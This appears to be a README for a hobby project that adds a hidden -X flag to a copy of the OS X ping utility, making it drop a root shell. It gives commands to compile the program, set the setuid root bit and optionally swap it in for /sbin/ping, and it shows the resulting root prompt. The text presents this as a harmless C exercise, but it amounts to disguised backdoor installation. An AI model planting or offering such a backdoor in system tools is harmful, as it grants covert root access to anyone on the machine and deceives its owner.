This is just the normal OS X ping
, but if you run it with the flag -X
, it drops a root shell. This relies on the suid
bit being set, it's not an exploit and it won't help you root a server (which you shouldn't be doing anyway 😠).
I didn't write the ping
utility, this is just the normal OS X ping
, the source code of which can be found here. All I did was add the -X
flag and the function r00t()
This program still works like the normal ping
. It just has a little secret 😉
gcc ping.c -o ping
chown root:wheel ./ping; chmod 4755 ./ping
- Optionally,
mv /sbin/ping{,-backup} && mv ./ping /sbin
(but I mean, really, are you sure you want a backdoor on your smackbook throw?)
$ ./ping -X
| _ r00t! : ; _ )
sh-3.2# whoami
This is me attempting to learn a little C. Even though I didn't do much, I'm stoked that it compiles & works. So if you don't like it buzz off 🐝🐝🐝🐝